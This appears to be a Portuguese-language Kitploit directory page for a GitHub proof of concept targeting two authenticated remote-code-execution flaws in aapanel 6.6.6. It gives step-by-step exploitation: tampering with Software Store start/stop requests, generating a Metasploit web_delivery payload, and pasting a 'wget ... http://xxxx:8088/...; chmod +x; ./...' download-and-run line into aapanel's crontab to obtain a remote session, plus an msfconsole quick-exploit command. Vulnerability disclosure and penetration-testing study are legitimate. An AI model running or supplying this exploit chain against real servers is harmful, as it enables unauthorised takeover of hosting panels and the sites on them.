Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
aapanel — aapanel 6.6.6 - (Authenticated) Remote Code Execution | Kitploit
Ferramentas/GitHubGitHub/jenaye/aapanel
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubjenaye/aapanel

aapanel

aapanel 6.6.6 - (Authenticated) Remote Code Execution

Ver Repositório
27há 6 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

aapanel

aapanel 6.6.6 - CVE-2020-14950

  • Descrição : permite que usuários remotos autenticados executem comandos arbitrários por meio do menu de configurações do Software Store.
  • Versão afetada : Todas <= 6.6.6

Informações

Para fazer este PoC, apenas instalei o software usando docker-compose

  • Tipo de vulnerabilidade : Execução remota de comandos (RCE autenticado)

POC

Vá para a Software Store, clique em qualquer linha do campo de configurações, intercepte a requisição quando clicar em "start/stop/restart" e modifique/edite a requisição para executar o que quiser. Aqui está um exemplo com curl :

receStore receStore

aapanel 6.6.6 - CVE-2020-14421

  • Descrição : Permite que um atacante execute comandos arbitrários remotamente
  • Versão afetada : Todas <= 6.6.6

Informações

Para fazer este PoC, instalei um Ubuntu 20.04 limpo, depois instalei wget + sudo e executei este script wget -O install.sh http://www.aapanel.com/script/install-ubuntu_6.0_en.sh && sudo bash install.sh

  • Tipo de vulnerabilidade : Execução remota de comandos (RCE autenticado)

POC

Primeiramente, configure as opções do web_delivery; isso criará um payload e um listener.

web_delivery

Agora execute-o

executar

isso gerará o seguinte payload:

wget -qO wt8v00sC --no-check-certificate http://xxxx:8088/gUVn1orp; chmod +x wt8v00sC; ./wt8v00sC& disown

Em seguida, copie/cole assim no script content do menu crontab no aapanel.

cron

Agora basta executar seu crontab e aguardar sua sessão.

comando

Exploit Rápido

Basta executar msfconsole -r aapanel.rc copie/cole o payload na seção script content e aproveite sua sessão.

Baixar ferramenta